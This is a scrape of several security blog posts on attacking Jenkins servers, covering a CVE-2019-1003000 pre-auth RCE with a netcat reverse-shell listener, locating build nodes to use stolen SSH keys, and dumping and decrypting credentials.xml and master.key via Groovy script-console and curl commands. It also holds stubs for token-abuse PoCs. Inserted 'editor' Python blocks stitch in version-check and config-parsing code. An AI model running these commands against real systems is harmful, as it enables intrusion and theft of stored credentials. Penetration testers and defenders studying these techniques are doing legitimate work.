<span style="background-color: white;"><span style="color: #444444; font-family: "ubuntu";"><a href="https://updates.jenkins.io/download/plugins/github/" target="_blank">https://updates.jenkins.io/download/plugins/github/</a></span></span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-68149048590467443612019-03-04T22:26:00.000-05:002019-03-04T22:26:46.045-05:00Jenkins - messing with exploits pt3 - CVE-2019-1003000<span style="color: #444444;">References:</span><br />
<span style="color: #444444;"><br /></span>
<a href="https://www.exploit-db.com/exploits/46453" target="_blank"><span style="color: #444444;">https://www.exploit-db.com/exploits/46453</span></a><br />
<a href="http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html" target="_blank"><span style="color: #444444;">http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html</span></a><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">This post covers the Orange Tsai Jenkins pre-auth exploit</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Vuln versions: Jenkins < 2.137 (preauth)</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Pipeline: Declarative Plugin up to and including 1.3.4</span><br />
<span style="color: #444444;">Pipeline: Groovy Plugin up to and including 2.61</span><br />
<span style="color: #444444;">Script Security Plugin up to and including 1.49 (in CG's testing 1.50 is also vuln)</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">The Exploit-DB link above has a nice self-contained exploit that compiles the jar for you and serves it up for retrieval by the vulnerable Jenkins server.</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3aWYiGSzqFouxlLuHO6NIRmeQkTANpp3YHqiLg9-3a9HF-jB_SzvWyuAo-S-74beguoNCsVD2XhX8rKmokJfz4e90H99B5K67eQ-nk3ib_yYMp1L9MsD2BUtR268z6XbmbHkMG2WcrqU/s1600/Screen+Shot+2019-03-04+at+10.10.59+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: #444444;"><img border="0" data-original-height="409" data-original-width="1600" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3aWYiGSzqFouxlLuHO6NIRmeQkTANpp3YHqiLg9-3a9HF-jB_SzvWyuAo-S-74beguoNCsVD2XhX8rKmokJfz4e90H99B5K67eQ-nk3ib_yYMp1L9MsD2BUtR268z6XbmbHkMG2WcrqU/s640/Screen+Shot+2019-03-04+at+10.10.59+PM.png" width="640" /></span></a></div>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: Courier New, Courier, monospace;">nc -l 8888 -vv</span><br />
<span style="color: #444444; font-family: Courier New, Courier, monospace;"><br /></span>
<span style="color: #444444; font-family: Courier New, Courier, monospace;">whoami</span><br />
<span style="color: #444444; font-family: Courier New, Courier, monospace;">bash: no job control in this shell</span><br />
<span style="color: #444444; font-family: Courier New, Courier, monospace;"> bash-3.2$ jenkins</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: Times, Times New Roman, serif;">From Jenkins 2.138 on, the pre-auth path is gone, but if you have Overall/Read access (a token or a logged-in session) and the plugins are still vulnerable, you can still exploit that server: just add your cookie to the script and it will hit the URL with your authenticated session.</span><br />
<span style="color: #444444; font-family: Times, Times New Roman, serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTCbP9HVZm6fIKHdmevuqtwz8tLMEtjqpkT3aQ_aUdB5AHhOYjqYk1sBF37FgAa2D3E9wXJheqsyYbBmh910-8B2y3WhmaKWDVLvpjeZzWgKPCAR1ar1-8WC9zJkqY0T6TzgkOcF1uUu8/s1600/Screen+Shot+2019-03-04+at+10.21.38+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: #444444;"><img border="0" data-original-height="244" data-original-width="1112" height="87" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTCbP9HVZm6fIKHdmevuqtwz8tLMEtjqpkT3aQ_aUdB5AHhOYjqYk1sBF37FgAa2D3E9wXJheqsyYbBmh910-8B2y3WhmaKWDVLvpjeZzWgKPCAR1ar1-8WC9zJkqY0T6TzgkOcF1uUu8/s400/Screen+Shot+2019-03-04+at+10.21.38+PM.png" width="400" /></span></a></div>
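Both of the last two posts come down to version gates: the GitHub plugin threshold in the CVE-2018-1000600 post above, and the core and plugin thresholds just listed for CVE-2019-1003000, where the core version also decides whether the path is pre-auth or needs Overall/Read. The following is an added example (editor's code, not from the page, from Jenkins or from the Exploit-DB script) that applies exactly the thresholds the page states to a plugin inventory. The plugin shortName mapping (pipeline-model-definition, workflow-cps, script-security, github) is the editor's, the sample JSON is constructed, and 2.137 itself is treated as still vulnerable, which matches the 2018-08-15 advisory but sits in the gap between the page's "< 2.137" and "after 2.138".

```python
"""Added example (not from the page, Jenkins, or the exploit-db script): decide,
from a Jenkins core version and its plugin list, which of the two issues on
this page apply and whether the 1003000 path is pre-auth. Thresholds are the
ones the page states; plugin shortNames are the editor's mapping."""
import json
from typing import Dict, List, Tuple


def parse_version(v: str) -> Tuple[int, ...]:
    """'2.150.3' -> (2, 150, 3). Non-numeric tails such as '1.29.1-beta' are cut off."""
    parts: List[int] = []
    for piece in v.split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        if not digits:
            break
        parts.append(int(digits))
    return tuple(parts)


def plugins_from_api(json_text: str) -> Dict[str, str]:
    """Map shortName -> version from the body of /pluginManager/api/json?depth=1
    (the permission that endpoint needs varies with the Jenkins version)."""
    return {p["shortName"]: p["version"] for p in json.loads(json_text).get("plugins", [])}


# Page-stated vulnerable ranges: plugin shortName -> highest vulnerable version.
META_PROGRAMMING_RCE = {                    # CVE-2019-1003000
    "pipeline-model-definition": "1.3.4",   # Pipeline: Declarative
    "workflow-cps": "2.61",                 # Pipeline: Groovy
    "script-security": "1.50",              # 1.49 per advisory, 1.50 also vuln in CG's testing
}
GITHUB_SSRF = {"github": "1.29.1"}          # CVE-2018-1000600


def vulnerable_plugins(installed: Dict[str, str], table: Dict[str, str]) -> List[str]:
    """Names of installed plugins at or below the table's highest vulnerable version."""
    return [name for name, maxv in table.items()
            if name in installed and parse_version(installed[name]) <= parse_version(maxv)]


def assess(core_version: str, installed: Dict[str, str]) -> Dict[str, object]:
    """core_version is what the X-Jenkins response header reports; installed maps
    plugin shortName -> version."""
    core = parse_version(core_version)
    rce = vulnerable_plugins(installed, META_PROGRAMMING_RCE)
    return {
        "cve-2019-1003000": bool(rce),
        "cve-2019-1003000_plugins": rce,
        # Page: pre-auth below 2.137, gone from 2.138; 2.137 treated as vulnerable here
        # (assumption matching the 2018-08-15 advisory). From there on Overall/Read is needed.
        "cve-2019-1003000_preauth": bool(rce) and core < (2, 138),
        "cve-2018-1000600": bool(vulnerable_plugins(installed, GITHUB_SSRF)),
    }
```

One caveat for LTS installs: the LTS line has its own fix version (the same advisory lists 2.121.3), so a plain `core < (2, 138)` over-reports for LTS version strings and the LTS threshold should be checked separately.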
<span style="font-family: Times, Times New Roman, serif;"><br /></span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-85759044095769594072019-03-04T21:16:00.002-05:002019-03-04T21:16:15.412-05:00Jenkins - Identify IP Addresses of nodes<span style="color: #444444;">While doing some research I found several posts on Stack Overflow asking how to identify the IP address of nodes. You might want to know this if you read the <a href="https://carnal0wnage.attackresearch.com/2019/02/jenkins-decrypting-credentialsxml.html" target="_blank">decrypting credentials post</a> and managed to get yourself some SSH keys for nodes, but can't actually see the node's IP in the Jenkins UI.</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Stackoverflow link: <a href="https://stackoverflow.com/questions/14930329/finding-ip-of-a-jenkins-node" target="_blank">https://stackoverflow.com/questions/14930329/finding-ip-of-a-jenkins-node</a></span><br />
<span style="color: #444444;">blog on setting up a node: <a href="https://embeddedartistry.com/blog/2017/12/22/jenkins-configuring-a-linux-slave-node" target="_blank">https://embeddedartistry.com/blog/2017/12/22/jenkins-configuring-a-linux-slave-node</a></span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">There are great answers in the Stack Overflow post on using the script console, but in the event you find yourself with just the Jenkins directory, or without access to the script console, it's pretty easy to get this information another way.</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">You can just browse to <span style="font-family: Courier New, Courier, monospace;">jenkins-ip/computer/$nodename/config.xml</span>. This request will require the <b>extended read </b>permission.</span><br />
<span style="color: #444444;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguSdi39W7IQVPRxn7K2eXB-ZnOy0NUQY9ojUe3_qbD31uOk6hZgft2dHwamo-OTP6q3w8YoiUgzVz2bO8LuoFlBtwh7-Akhw5oegYYLfwZry5z7_2IQLHIop65eCYi4hoedRXBm9gPvgI/s1600/Screen+Shot+2019-03-04+at+9.14.23+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: #444444;"><img border="0" data-original-height="636" data-original-width="1600" height="254" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguSdi39W7IQVPRxn7K2eXB-ZnOy0NUQY9ojUe3_qbD31uOk6hZgft2dHwamo-OTP6q3w8YoiUgzVz2bO8LuoFlBtwh7-Akhw5oegYYLfwZry5z7_2IQLHIop65eCYi4hoedRXBm9gPvgI/s640/Screen+Shot+2019-03-04+at+9.14.23+PM.png" width="640" /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Optionally if you are on the box or have a backup you can go to <span style="font-family: Courier New, Courier, monospace;">jenkins-dir/nodes/$nodename/config.xml</span></span><br />
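Either way you end up with the node's config.xml, so the remaining work is reading the launcher block out of it. The following is an added example (editor's code, not from the page or from Jenkins) that fetches `/computer/$nodename/config.xml` over HTTP basic auth or parses a copy from `nodes/$nodename/config.xml`, and returns the host, port and credentials ID. The element names are the ones the SSH agent launcher (`hudson.plugins.sshslaves.SSHLauncher`) writes; the sample XML, host and credentials ID are constructed, and the API-token basic auth is an assumption.

```python
"""Added example, not from the page or from Jenkins: pull a node's config.xml
(over HTTP with Extended Read, or from a JENKINS_HOME copy) and read the
launcher's host, port and credentialsId. Element names are those written by
the SSH agent launcher; the sample XML, host and credentials are constructed."""
import base64
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET
from typing import Dict, Optional

# Constructed sample of the relevant part of nodes/<name>/config.xml.
SAMPLE_CONFIG = """<?xml version='1.0' encoding='UTF-8'?>
<slave>
  <name>build-01</name>
  <launcher class="hudson.plugins.sshslaves.SSHLauncher" plugin="ssh-slaves@1.29.4">
    <host>10.0.0.51</host>
    <port>22</port>
    <credentialsId>deploy-key-build</credentialsId>
  </launcher>
</slave>
"""


def node_endpoint(config_xml: str) -> Dict[str, Optional[str]]:
    """Return name, launcher class, host, port and credentialsId. Values are None
    when absent, e.g. for inbound (JNLP) agents, which connect out to the master
    and therefore carry no host in their config."""
    root = ET.fromstring(config_xml)
    out: Dict[str, Optional[str]] = {
        "name": root.findtext("name"), "launcher": None,
        "host": None, "port": None, "credentialsId": None,
    }
    launcher = root.find("launcher")
    if launcher is not None:
        out["launcher"] = launcher.get("class")
        for key in ("host", "port", "credentialsId"):
            out[key] = launcher.findtext(key)
    return out


def fetch_node_config(jenkins: str, node: str, user: str, token: str,
                      timeout: float = 10.0) -> str:
    """GET /computer/<node>/config.xml (needs Extended Read) with HTTP basic auth;
    an API token is assumed for `token`."""
    url = f"{jenkins.rstrip('/')}/computer/{urllib.parse.quote(node)}/config.xml"
    req = urllib.request.Request(url)
    cred = base64.b64encode(f"{user}:{token}".encode()).decode()
    req.add_header("Authorization", "Basic " + cred)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")
```

The credentialsId is the value to look up in credentials.xml (see the decrypting credentials post), which ties the SSH key you decrypted to the host it opens. Since the XML comes from a server you do not control, use defusedxml instead of xml.etree if you would rather not trust it at all.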
<span style="color: #444444; font-family: Courier New, Courier, monospace;"><br /></span>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-78079810961179254352019-02-28T10:22:00.001-05:002019-04-08T16:34:04.155-04:00Jenkins - decrypting credentials.xml<span style="color: #444444;">If you find yourself on a Jenkins box with script console access you can decrypt the saved passwords in credentials.xml in the following way:</span><br />
<span style="color: #444444;"><span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace;">encrypted_pw='$ENCRYPTED_PASSWORD'</span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace;">passwd = hudson.util.Secret.decrypt(encrypted_pw)</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace;">println(passwd)</span><br />
<span style="color: #444444;"><span style="color: #444444;"><br /></span>
<span style="color: #444444;">You need to run this on the Jenkins instance itself (in its script console), since <span style="font-family: "courier new" , "courier" , monospace;">hudson.util.Secret</span> decrypts with that instance's local <span style="font-family: "courier new" , "courier" , monospace;">master.key</span>. The value in credentials.xml is encrypted, not hashed, which is why it can be recovered at all.</span></span><br />
<span style="color: #444444;"><span style="color: #444444; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="color: #444444; font-family: inherit;">Screenshot below</span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFkNV99_ybWbNJyDmwPMmSSXQjENMDnE36smHLghTMvOU7s0-NftJevAI7EIfcwPXTvMqT6jfMhLIQ6f_cfbOIBQRj6gTCTBTFayd1fXh36_LT4pMc5t2dXLmBi0PvrRX5yxbYfjF_6_Y/s1600/Screen+Shot+2019-02-28+at+9.55.48+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: #444444;"><img border="0" data-original-height="914" data-original-width="1600" height="364" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFkNV99_ybWbNJyDmwPMmSSXQjENMDnE36smHLghTMvOU7s0-NftJevAI7EIfcwPXTvMqT6jfMhLIQ6f_cfbOIBQRj6gTCTBTFayd1fXh36_LT4pMc5t2dXLmBi0PvrRX5yxbYfjF_6_Y/s640/Screen+Shot+2019-02-28+at+9.55.48+AM.png" width="640" /></span></a></div>
<span style="color: #444444;"><span style="color: #444444; font-family: inherit;"><br /></span>
<span style="color: #444444; font-family: inherit;">Code to get the credentials.xml from the script console</span></span><br />
<span style="color: #444444;"><span style="color: #444444; font-family: inherit;"><br /></span>
<span style="color: #444444; font-family: inherit;">Windows</span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace;">def sout = new StringBuffer(), serr = new StringBuffer()</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace;">def proc = 'cmd.exe /c type credentials.xml'.execute()</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace;">proc.consumeProcessOutput(sout, serr)</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace;">proc.waitForOrKill(1000)</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="color: #444444;">println "out> $sout err> $serr"</span></span><br />
<span style="color: #444444;"><span style="color: #444444; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">*nix</span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace;">def sout = new StringBuffer(), serr = new StringBuffer()</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace;">def proc = 'cat credentials.xml'.execute()</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace;">proc.consumeProcessOutput(sout, serr)</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace;">proc.waitForOrKill(1000)</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="color: #444444;">println "out> $sout err> $serr"</span></span><br />
<span style="color: #444444;"><span style="color: #444444; font-family: "courier new" , "courier" , monospace;"><br /></span>
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQIHvKbwhDc3MnTLBUNVpJpO-SYFTD9LzT4EI-9F32ceUTTmNFzasq3UhNcROCNsyoaj31MCCjfagBiz7AaA2niGeV67HrTq7Hx-jBX2myMapp9c3Lnafej497JkJy9T5TlaOmcDfAI6w/s1600/Screen+Shot+2019-02-28+at+10.02.18+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: #444444;"><img border="0" data-original-height="840" data-original-width="1566" height="342" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQIHvKbwhDc3MnTLBUNVpJpO-SYFTD9LzT4EI-9F32ceUTTmNFzasq3UhNcROCNsyoaj31MCCjfagBiz7AaA2niGeV67HrTq7Hx-jBX2myMapp9c3Lnafej497JkJy9T5TlaOmcDfAI6w/s640/Screen+Shot+2019-02-28+at+10.02.18+AM.png" width="640" /></span></a></div>
<span style="color: #444444;"><span style="color: #444444; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="color: #444444; font-family: inherit;"><br /></span>
<span style="color: #444444; font-family: inherit;"><br /></span>
<span style="color: #444444; font-family: inherit;">If you just want to do it with curl you can hit the scriptText endpoint and do something like this:</span></span><br />
<span style="color: #444444; font-family: inherit;"><br />Windows:</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace;">curl -u admin:admin http://10.0.0.160:8080/scriptText --data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+/c+type+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run"</span><br />
<span style="color: #444444;"><span style="color: #444444; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="color: #444444; font-family: inherit;">Also because this syntax took me a minute to figure out for files in subdirectories:</span></span><br />
<span style="color: #444444;"><span style="color: #444444; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace;">curl -u admin:admin http://10.0.0.160:8080/scriptText --data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+/c+type+<b>s</b><b>ecrets%5C\master.key</b>%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run"</span></span><br />
<span style="color: #444444;"><span style="color: #444444; font-family: "times" , "times new roman" , serif;"><br /></span>
<span style="color: #444444;">*nix</span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace;">curl -u admin:admin http://10.0.0.160:8080/scriptText --data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cat+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run"</span><br />
<span style="color: #444444;"><span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Then to decrypt any passwords:</span></span><br />
<span style="color: #444444;"><span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace;">curl -u admin:admin http://10.0.0.160:8080/scriptText --data "script=println(hudson.util.Secret.fromString('7pXrOOFP1XG62UsWyeeSI1m06YaOFI3s26WVkOsTUx0=').getPlainText())"</span></span><br />
<span style="color: #444444;"><span style="color: #444444; font-family: "courier new" , "courier" , monospace;"><br /></span>
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnJuSqASqUWdvE0oTGOlvRV3iDBonwuY0va3DMBKxzN1yaLRNUvcyWhN9lJWfWyuU53FzGI7uSKMZGp4wRofTjfpvUOgsr2Jfm-a_vD70VT1yLfSq4ezUewTEHrjZhmfFhK8AJOAAkfQ4/s1600/Screen+Shot+2019-02-28+at+10.04.59+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: #444444;"><img border="0" data-original-height="111" data-original-width="1600" height="44" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnJuSqASqUWdvE0oTGOlvRV3iDBonwuY0va3DMBKxzN1yaLRNUvcyWhN9lJWfWyuU53FzGI7uSKMZGp4wRofTjfpvUOgsr2Jfm-a_vD70VT1yLfSq4ezUewTEHrjZhmfFhK8AJOAAkfQ4/s640/Screen+Shot+2019-02-28+at+10.04.59+AM.png" width="640" /></span></a></div>
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
</span><br />
<span style="color: #444444; font-family: inherit;">If you are in a position where you have the files but no access to jenkins you can use:</span><br />
<a href="https://github.com/tweksteen/jenkins-decrypt" target="_blank"><span style="color: #444444;">https://github.com/tweksteen/jenkins-decrypt</span></a><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">There is a small bug in the Python script's regex that I haven't bothered to fix at the time of this post, so here is a version where, instead of the regex, I'm just printing out the values so you can see the decrypted password. The change is on line 55.</span><br />
<span style="color: #444444;"><br /></span>
<script src="https://gist.github.com/carnal0wnage/80611a9c035046b2d400d90303355ff0.js"></script>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLuVGgZLrxASVed0FYXj8PJ0a5qEfGetD3qgTAXTTJAdJ97B2zcq0qezPogtYE8vor3hbUSfK2vVIXL688vx5OFU6WX0cc0obWV5cZwUKsfKgWr3sxl427v4pQA1mxWFL2Lxx5O6OkeAQ/s1600/Screen+Shot+2019-02-28+at+10.20.54+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: #444444;"><img border="0" data-original-height="251" data-original-width="1600" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLuVGgZLrxASVed0FYXj8PJ0a5qEfGetD3qgTAXTTJAdJ97B2zcq0qezPogtYE8vor3hbUSfK2vVIXL688vx5OFU6WX0cc0obWV5cZwUKsfKgWr3sxl427v4pQA1mxWFL2Lxx5O6OkeAQ/s640/Screen+Shot+2019-02-28+at+10.20.54+AM.png" width="640" /></span></a></div>
<br />
<span style="color: #444444;">Edit 4 March 19: the script only regexes for password (line 72), so you might need to swap out the regex if there are SSH keys or other secrets... read the credentials.xml file :-)</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Edit 8 April 19: This tweet outlines another, similar way:</span><br />
<span style="color: #444444;"><a href="https://twitter.com/netmux/status/1115237815590236160" target="_blank">https://twitter.com/netmux/status/1115237815590236160</a></span><br />
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-76259180729543277722019-02-27T19:51:00.000-05:002019-02-27T20:00:20.616-05:00Jenkins - SECURITY-180/CVE-2015-1814 PoC<span style="font-family: inherit;"><b>Forced API token change</b></span><br />
<span style="font-family: inherit;"><b><br /></b></span>
<span style="font-family: inherit;">SECURITY-180/CVE-2015-1814</span><br />
<br />
<div>
<a href="https://jenkins.io/security/advisory/2015-03-23/#security-180cve-2015-1814-forced-api-token-change" target="_blank"><span style="font-family: inherit;">https://jenkins.io/security/advisory/2015-03-23/#security-180cve-2015-1814-forced-api-token-change</span></a></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<div class="sect1" style="background-color: white; box-sizing: border-box; color: #212529;">
<h2 id="affected-versions" style="box-sizing: border-box; color: inherit; line-height: 1.2; margin-bottom: 0.5rem; margin-top: 0px;">
<span style="font-family: inherit; font-size: small;">Affected Versions<span style="font-stretch: normal; font-weight: 500; line-height: 1; padding: 0.4em 1em 0.4em 0.375em;"><a aria-label="Anchor" class="anchorjs-link " data-anchorjs-icon="" href="https://jenkins.io/security/advisory/2015-03-23/#affected-versions" style="background-color: transparent; box-sizing: border-box; color: #006699; font-stretch: normal; line-height: 1; opacity: 0; padding: 0.4em 1em 0.4em 0.375em;"></a></span></span></h2>
<div class="sectionbody" style="box-sizing: border-box;">
<div class="ulist" style="box-sizing: border-box;">
<ul style="box-sizing: border-box; margin-bottom: 1rem; margin-top: 0px;">
<li style="box-sizing: border-box;"><div style="box-sizing: border-box; padding: 0px;">
<span style="font-family: inherit;">All Jenkins releases &lt;= 1.605</span></div>
</li>
<li style="box-sizing: border-box;"><div style="box-sizing: border-box; padding: 0px;">
<span style="font-family: inherit;">All LTS releases &lt;= 1.596.1</span></div>
</li>
</ul>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<span style="font-family: inherit;">PoC</span><br />
<span style="font-family: inherit;">Tested against Jenkins 1.605</span></div>
<div>
<script src="https://gist.github.com/carnal0wnage/fad7c95492224e609ddc47fb08ac8438.js"></script>
<span style="font-family: "times" , "times new roman" , serif;"><br /></span></div>
<div>
<span style="font-family: "times" , "times new roman" , serif;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUMNNlMApucEgr08GNPrPpLYl0Y7DDWy-zNeHBWzcGsgdfSFF0YnBHwALxNsVNU8CgZD9hV5ZqNd46Z6fnXTGRyZV6rEqIuWqmUXsHi8gM2gqqRp0b4UDAm8W8z25Ajr8T0NRtqT-59JQ/s1600/Screen+Shot+2019-02-27+at+7.46.30+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="455" data-original-width="1600" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUMNNlMApucEgr08GNPrPpLYl0Y7DDWy-zNeHBWzcGsgdfSFF0YnBHwALxNsVNU8CgZD9hV5ZqNd46Z6fnXTGRyZV6rEqIuWqmUXsHi8gM2gqqRp0b4UDAm8W8z25Ajr8T0NRtqT-59JQ/s640/Screen+Shot+2019-02-27+at+7.46.30+PM.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Burp output</td></tr>
</tbody></table>
<div>
<span style="font-family: "times" , "times new roman" , serif;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK59TUij35SeTm9EBELz8JyqdosmybjHZdqfbeGNJfLTwWvC1MmbzhZcwKu-EZU0tO0ONY_zSmWnmZQm3hauWx10S3sX5Sv0-oiDpggjFfg8TEfp40ySv8-2Bc9OR0Xga_T8esYD6f7Fs/s1600/Screen+Shot+2019-02-27+at+7.47.37+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="379" data-original-width="1600" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK59TUij35SeTm9EBELz8JyqdosmybjHZdqfbeGNJfLTwWvC1MmbzhZcwKu-EZU0tO0ONY_zSmWnmZQm3hauWx10S3sX5Sv0-oiDpggjFfg8TEfp40ySv8-2Bc9OR0Xga_T8esYD6f7Fs/s640/Screen+Shot+2019-02-27+at+7.47.37+PM.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Validate new token works</td></tr>
</tbody></table>
<div>
<span style="font-family: "times" , "times new roman" , serif;"><br /></span></div>
<div>
<br />
<br /></div>
</div>
</div>
</div>
<div class="sect1" style="background-color: white; box-sizing: border-box; color: #212529; font-family: lato, Roboto, "Open Sans", sans-serif; font-size: 14px;">
</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-10129918453382270372019-02-27T19:14:00.001-05:002019-02-27T19:58:55.383-05:00Jenkins - SECURITY-200 / CVE-2015-5323 PoC<div style="background-color: white; box-sizing: border-box; line-height: 1.2; margin-bottom: 0.5rem; margin-top: 0px;">
<b><span style="font-family: inherit; font-size: large;">API tokens of other users available to admins</span></b><br />
<div style="color: #212529;">
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">SECURITY-200 / CVE-2015-5323</span></div>
<div style="color: #212529;">
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">API tokens of other users were exposed to admins by default. On instances that don’t implicitly grant RunScripts permission to admins, this allowed admins to run scripts with another user’s credentials.</span></div>
<div style="color: #212529;">
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<b><span style="font-family: inherit;">Affected versions</span></b></div>
<div style="color: #212529;">
<span style="font-family: inherit;">All Jenkins main line releases up to and including 1.637</span></div>
<div style="color: #212529;">
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">All Jenkins LTS releases up to and including 1.625.1</span></div>
<div style="color: #212529;">
<span style="font-family: inherit;"><br /></span>
<b><span style="font-family: inherit;">PoC</span></b></div>
<div style="color: #212529;">
<script src="https://gist.github.com/carnal0wnage/1f316c01eaa7707c3cc6497ef04857a8.js"></script><span style="font-family: inherit;">
